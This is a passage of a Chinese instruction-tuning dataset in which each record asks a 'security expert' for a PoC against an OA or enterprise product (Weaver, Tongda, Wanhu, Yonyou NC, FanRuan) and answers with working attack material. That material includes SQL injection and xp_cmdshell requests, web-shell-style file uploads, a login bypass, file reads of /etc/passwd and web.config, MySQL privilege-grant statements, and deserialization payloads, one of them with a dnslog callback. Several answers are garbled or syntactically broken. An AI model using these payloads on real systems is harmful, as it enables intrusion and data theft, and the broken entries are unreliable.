  965. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology users.data 敏感信息泄漏\n漏洞描述:泛微OA E-Cology users.data 允许任意用户下载,获取OA中的敏感信息\n影响版本:``` 泛微OA E-Cology ```\n网络测绘:``` app=\"泛微-协同商务系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Cology\n2. app=\"泛微-协同商务系统\"\n3. /messager/users.data\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology users.data 敏感信息泄漏.md"}
    966. 

  966. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office group_xml.php SQL注入漏洞\n漏洞描述:泛微OA E-Office group_xml.php文件存在SQL注入漏洞,攻击者通过漏洞可以写入Webshell文件获取服务器权限\n影响版本:``` 泛微OA E-Office 8 ```\n网络测绘:``` app=\"泛微-EOffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Office 8\n2. app=\"泛微-EOffice\"\n3. session_start( );\ninclude_once( \"inc/conn.php\" );\ninclude_once( \"inc/xtree_xml.inc.php\" );\ninclude_once( \"inc/utility_all.php\" );\nheader( \"Expires: Mon, 26 Jul 1997 05:00:00 GMT\" );\nheader( \"Cache-Control: no-cache, must-revalidate\" );\nheader( \"Pragma: no-cache\" );\nheader( \"Content-Type: text/xml\" );\n$pararr = explodestpar( $_REQUEST['par'] );\n$groupid = $pararr['groupid'];\nif ( $groupid == \"\" )\n{\n\t\t\t\texit( );\n}\n$groupurl_fix = \"?\";\n$userurl_fix = \"?\";\nif ( 0 < strpos( $pararr['group_url'], \"?\" ) )\n{\n\t\t\t\t$groupurl_fix = \"&\";\n}\nif ( 0 < strpos( $pararr['user_url'], \"?\" ) )\n{\n\t\t\t\t$userurl_fix = \"&\";\n}\n$xtreeXml = new xtreeXml( );\n$xtreeXml->initXml( );\nif ( $pararr['group'] == 1 )\n{\n\t\t\t\t$sql = \"SELECT * FROM pub_group WHERE GROUP_ID=\".$groupid.\"\";\n}\nelse\n{\n\t\t\t\t$sql = \"SELECT * FROM USER,USER_GROUP WHERE USER_GROUP.GROUP_ID=\".$groupid.\"\";\n}\n$rs = exequery( $connection, $sql );\n$row = mysql_fetch_array( $rs );\n$groupmember = $row['GROUP_MEMBER'];\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office group_xml.php SQL注入漏洞.md"}
    967. 

  967. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA showResult.action 后台SQL注入漏洞\n漏洞描述:万户OA showResult.action 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. POST /defaultroot/Graph!showResult.action HTTP/1.1 \nHost: \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded \nContent-Length: 69 \nConnection: close\nCookie: OASESSIONID=5AC1D44965A277C90D94B57DEDA82992; LocLan=zh_CN; JSESSIONID=5AC1D44965A277C90D94B57DEDA82992; OASESSIONID=5AC1D44965A277C90D94B57DEDA82992; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserName=dsfssaq; ezofficeUserPortal=; ezofficePortal135=1 \nUpgrade-Insecure-Requests: 1\n\ndatabase=localDataSource&dataSQL=exec+master..xp_cmdshell+\"ipconfig\";\n3. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA showResult.action 后台SQL注入漏洞.md"}
    968. 

  968. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA 部分漏洞信息整合\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. http[s]://TongDaOA.domain/inc/expired.php 判断通达版本\nhttp[s]://TongDaOA.domain/inc/reg_trial.php\nhttp[s]://TongDaOA.domain/inc/reg_trial_submit.php\nhttp[s]://TongDaOA.domain/ispirit/retrieve_pwd.php\nGET 参数username、email 可爆用户、邮箱\nhttp[s]://TongDaOA.domain/resque/worker.php 计算机名\n2. http[s]://TongDaOA.domain/module/crm2010/imageOperation/deleteImage.php \nhttp[s]://TongDaOA.domain/module/crm2010/product/type_tree.php \nhttp[s]://TongDaOA.domain/module/crm2010/select/getData.php \nhttp[s]://TongDaOA.domain/module/crm2010/select/getValue.php \nhttp[s]://TongDaOA.domain/module/crm2010/select/index.php \nhttp[s]://TongDaOA.domain/module/crm2010/share/update.php \nhttp[s]://TongDaOA.domain/portal/webportals/source/oa/news.php\nhttp[s]://TongDaOA.domain/portal/webportals/source/oa/notify.php?LOGIN_USER_ID=\nhttp[s]://TongDaOA.domain/task/crm/account_care_remind.php\nhttp[s]://TongDaOA.domain/task/crm/action_link_remind.php\nhttp[s]://TongDaOA.domain/task/crm/contract_birthday_remind.php\nhttp[s]://TongDaOA.domain/task/crm/contract_near_remind.php\nhttp[s]://TongDaOA.domain/task/crm/contract_remind.php\nhttp[s]://TongDaOA.domain/task/crm/crm_account_contact_bir_remind.php\nhttp[s]://TongDaOA.domain/task/crm/crm_complain_remind.php\nhttp[s]://TongDaOA.domain/task/crm/crm_opportunity_status_remind.php\nhttp[s]://TongDaOA.domain/task/crm/crm_salepay_remind.php\nhttp[s]://TongDaOA.domain/task/crm/crm_stockout_remind.php\nhttp[s]://TongDaOA.domain/task/crm/marketing_near_remind.php\nhttp[s]://TongDaOA.domain/task/crm/order_to_stockout_remind.php\nhttp[s]://TongDaOA.domain/task/crm/payment_near_remind.php\nhttp[s]://TongDaOA.domain/task/crm/storage_near_remind.php\nhttp[s]://TongDaOA.domain/ispirit/myoa.php\nhttp[s]://TongDaOA.domain/ispirit/retrieve_pwd.php\n3. http[s]://TongDaOA.domain/general/approve_center/list/roll_config.inc.php\nhttp[s]://TongDaOA.domain/general/bi_design/reportshop/report_bi.func.php\nhttp[s]://TongDaOA.domain/general/data_center/console/autocode/autocode.php\nhttp[s]://TongDaOA.domain/general/data_center/model_design/console/autocode/autocode.php\nhttp[s]://TongDaOA.domain/general/data_center/model_design/design/report/action.php\nhttp[s]://TongDaOA.domain/general/reportshop/design/report/action.php\nhttp[s]://TongDaOA.domain/general/project/portal/details/budget/table.php\nhttp[s]://TongDaOA.domain/general/reportshop/design/report/console/autocode/autocode.php\nhttp[s]://TongDaOA.domain/general/reportshop/workshop/report/attachment-remark/form3.php\nhttp[s]://TongDaOA.domain/general/system/user/get_key_user_info.php\nhttp[s]://TongDaOA.domain/general/workflow/list/roll_config.inc.php\nhttp[s]://TongDaOA.domain/interface/GetNewAPP.php\nhttp[s]://TongDaOA.domain/interface/GetNewAPP1.php\nhttp[s]://TongDaOA.domain/general/workflow/plugin/turn/kd_k3_applly/kd_k3_applly.php\nhttp[s]://TongDaOA.domain/general/workflow/document_list/roll_config.inc.php\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA 部分漏洞信息整合.md"}
    969. 

  969. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA download_ftp.jsp 任意文件下载漏洞\n漏洞描述:万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA download_ftp.jsp 任意文件下载漏洞.md"}
    970. 

  970. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104\n漏洞描述:在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限\n影响版本:``` 泛微OA V8 ```\n网络测绘:``` app=\"泛微-EOffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-EOffice\"\n2. POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\nAccept-Encoding: gzip, deflate\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nConnection: close\nAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6\nCookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348\nContent-Length: 193\nContent-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\n\n--e64bdf16c554bbc109cecef6451c26a4\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test.php\"\nContent-Type: image/jpeg\n\n<?php phpinfo();?>\n\n--e64bdf16c554bbc109cecef6451c26a4--\n3. /images/logo/logo-eoffice.php\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104.md"}
    971. 

  971. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC FileReceiveServlet 反序列化RCE漏洞\n漏洞描述:用友NC 存在反序列化 RCE漏洞,攻击者可利用控制服务器\n影响版本:``` 用友NC 6.5 ```\n网络测绘:``` app=\"用友-UFIDA-NC\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-UFIDA-NC\"\n2. Object obj = 改动Locator.getInstance().lookup(\"ServletContext\");\n        Field contextField = obj.getClass().getDeclaredField(\"context\");\n        contextField.setAccessible(true);\n        obj = contextField.get(obj);\n        Field contextField1 = obj.getClass().getDeclaredField(\"context\");\n        contextField1.setAccessible(true);\n        addFitlertoTomcat(contextField1.get(obj));\n3. out = new ObjectOutputStream(output);\n            in = new ObjectInputStream(request.getInputStream());\n            String dsName = (String)in.readObject();\n            }\n        } catch (Exception var14) {\n            var14.printStackTrace();\n            if (out == null) {\n                throw new ServletException(var14);\n            }\n\n            out.writeObject(var14);\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md"}
    972. 

  972. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:启莱OA treelist.aspx SQL注入漏洞\n漏洞描述:启莱OA treelist.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 启莱OA ```\n网络测绘:``` app=\"启莱OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1\n2. http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/启莱OA treelist.aspx SQL注入漏洞.md"}
    973. 

  973. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.5 logincheck_code.php 登陆绕过漏洞\n漏洞描述:通达OA v11.8 logincheck_code.php存在登陆绕过漏洞,通过漏洞攻击者可以登陆系统管理员后台\n影响版本:``` 通达OA v11.8 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. GET /general/login_code.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nAccept-Encoding: gzip\n3. POST /logincheck_code.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 56\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCODEUID=%7BD384F12E-A758-F44F-8A37-20E2568306A7%7D&UID=1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.5 logincheck_code.php 登陆绕过漏洞.md"}
    974. 

  974. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:红帆OA ioFileExport.aspx 任意文件读取漏洞\n漏洞描述:红帆OA ioFileExport.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感信息\n影响版本:``` 红帆OA ```\n网络测绘:``` app=\"红帆-ioffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"红帆-ioffice\"\n2. /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream\n3. /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/红帆OA ioFileExport.aspx 任意文件读取漏洞.md"}
    975. 

  975. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.6 report_bi.func.php SQL注入漏洞\n漏洞描述:通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息\n影响版本:``` 通达OA v11.6 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 113\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&\n3. User-Agent: Go-http-client/1.1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.6 report_bi.func.php SQL注入漏洞.md"}
    976. 

  976. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.7 delete_cascade.php 后台SQL注入\n漏洞描述:通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器\n影响版本:``` 通达OA v11.7 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. select if((substr(user(),1,1)='r'),1,power(9999,99)) # 当字符相等时,不报错,错误时报错\n2. grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION\n3. UPDATE `mysql`.`user` SET `Password` = '*FBCFBB73CF21D4F464A95E775B40AF27A679CD2D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('peiqi' AS Binary(5));\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.7 delete_cascade.php 后台SQL注入.md"}
    977. 

  977. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞\n漏洞描述:泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击着通过发送特殊的请求包可以获取管理员Session\n影响版本:``` 泛微OA E-Cology ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Cology\n2. app=\"泛微-协同办公OA\"\n3. POST /mobile/plugin/VerifyQuickLogin.jsp\n  \nidentifier=1&language=1&ipaddress=x.x.x.x\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞.md"}
    978. 

  978. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 createMysql.jsp 数据库敏感信息泄露\n漏洞描述:致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5\n影响版本:``` 致远OA A6 ```\n网络测绘:``` title=\"致远A8+协同管理软件.A6\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8+协同管理软件.A6\"\n2. /yyoa/createMysql.jsp\n/yyoa/ext/createMysql.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 createMysql.jsp 数据库敏感信息泄露.md"}
    979. 

  979. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC XbrlPersistenceServlet反序列化\n漏洞描述:用友 NC XbrlPersistenceServlet反序列化漏洞\n影响版本:``` 用友NC ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 攻击队利用用友nc反序列利用\n目前测试影响版本:nc6.5\n漏洞url为:\n/service/~xbrl/XbrlPersistenceServlet\npoc:\n\nimport requests\nimport threadpool\nimport urllib3\nimport sys\nimport base64\n\nip = \"\"\ndnslog = \"\\x79\\x37\\x64\\x70\\\" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显\ndata = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x0c\\x6a\\x61\\x76\\x61\\x2e\\x6e\\x65\\x74\\x2e\\x55\\x52\\x4c\\x96\\x25\\x37\\x36\\x1a\\xfc\\xe4\\x72\\x03\\x00\\x07\\x49\\x00\\x08\\x68\\x61\\x73\\x68\\x43\\x6f\\x64\\x65\\x49\\x00\\x04\\x70\\x6f\\x72\\x74\\x4c\\x00\\x09\\x61\\x75\\x74\\x68\\x6f\\x72\\x69\\x74\\x79\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x04\\x66\\x69\\x6c\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x04\\x68\\x6f\\x73\\x74\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x03\\x72\\x65\\x66\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x50\\x74\\x00\\x11\"+dnslog+\"\\x3a\\x38\\x30\\x74\\x00\\x00\\x74\\x00\\x0e\"+dnslog+\"\\x74\\x00\\x04\\x68\\x74\\x74\\x70\\x70\\x78\\x74\\x00\\x18\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\"+dnslog+\"\\x3a\\x38\\x30\\x78\"\n\nuploadHeader={\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"}\nreq = requests.post(\"http://+\"ip\"+/service/~xbrl/XbrlPersistenceServlet\", headers=uploadHeader, verify=False, data=data, timeout=25)\nprint (req.text)\n2. /service/~xbrl/XbrlPersistenceServlet\n3. print (req.text)\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC XbrlPersistenceServlet反序列化.md"}
    980. 

  980. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:启莱OA messageurl.aspx SQL注入漏洞\n漏洞描述:启莱OA messageurl.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 启莱OA ```\n网络测绘:``` app=\"启莱OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1\n2. http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/启莱OA messageurl.aspx SQL注入漏洞.md"}
    981. 

  981. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-cology KtreeUploadAction 任意文件上传\n漏洞描述:参考链接: - [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd)\n影响版本:``` 目前已修复 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\nContent-Type: multipart/form-data; boundary=--------1638451160\nContent-Length: 171\n\n----------1638451160\nContent-Disposition: form-data; name=\"test\"; filename=\"test.jsp\"\nContent-Type: image/jpeg\n\nhelloword\n----------1638451160--\n2. - [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd)\n3. Host: 127.0.0.1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md"}
    982. 

  982. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:帆软报表 channel 远程命令执行漏洞\n漏洞描述:帆软报表 channel 接口存在远程命令执行漏洞, 攻击者通过漏洞可以获取服务器权限,攻击服务器\n影响版本:帆软报表\n网络测绘:``` \"Powered by 帆软\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. \"Powered by 帆软\"\n2. java -jar ysoserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch \"cmd\" > fine10.bin\n\nPOST /webroot/decision/remote/design/channel HTTP/1.1\nContent-Type: application/json\nHost: \ncmd: id\nConnection: close\n\n{{gzip(file(fine10.bin))}}\n3. Content-Type: application/json\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/帆软报表 channel 远程命令执行漏洞.md"}
    983. 

  983. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Bridge saveYZJFile 任意文件读取漏洞\n漏洞描述:泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。\n影响版本:``` 泛微云桥 e-Bridge 2018-2019 多个版本 ```\n网络测绘:``` title=\"泛微云桥e-Bridge\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微云桥 e-Bridge 2018-2019 多个版本\n2. title=\"泛微云桥e-Bridge\"\n3. #!/usr/bin/python3\n#-*- coding:utf-8 -*-\n# author : PeiQi\n# from   : http://wiki.peiqi.tech\n\nimport base64\nimport requests\nimport random\nimport re\nimport json\nimport sys\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号 : PeiQi文库                                                         \\033[0m')\n    print('+  \\033[34mVersion: 泛微云桥 e-Bridge                                          \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\n# 判断操作系统 or 判断漏洞是否可利用\ndef POC_1(target_url):\n    vuln_url_1 = target_url + \"/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt\"\n    vuln_url_2 = target_url + \"/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt\"\n    vuln_url_3 = target_url + \"/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt\"\n\n\n    headers = {\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n                \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    try:\n        response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)\n        response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)\n        response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)\n        if \"无法验证您的身份\" in response_1.text and \"无法验证您的身份\" in response_2.text:\n            print(\"\\033[31m[x] 漏洞已修复,不存在漏洞 \\033[0m\")\n            sys.exit(0)\n        else:\n            if \"No such file or directory\" in response_1.text:\n                print(\"\\033[32m[o] 目标为 Linux 系统\\033[0m\")\n                id = re.findall(r'\"id\":\"(.*?)\"', response_3.text)[0]\n                print(\"\\033[32m[o] 成功获取id:{}\\033[0m\".format(id))\n                return id,\"linux\"\n            elif \"系统找不到指定的路径\" in response_2.text:\n                print(\"\\033[32m[o] 目标为 Windows 系统\\033[0m\")\n                id = re.findall(r'\"id\":\"(.*?)\"', response_1.text)[0]\n                print(\"\\033[32m[o] 成功获取id:{}\\033[0m\".format(id))\n                return id,\"windows\"\n\n            else:\n                print(\"\\033[31m[x] 无法获取目标系统\\033[0m\")\n                sys.exit(0)\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败:{} 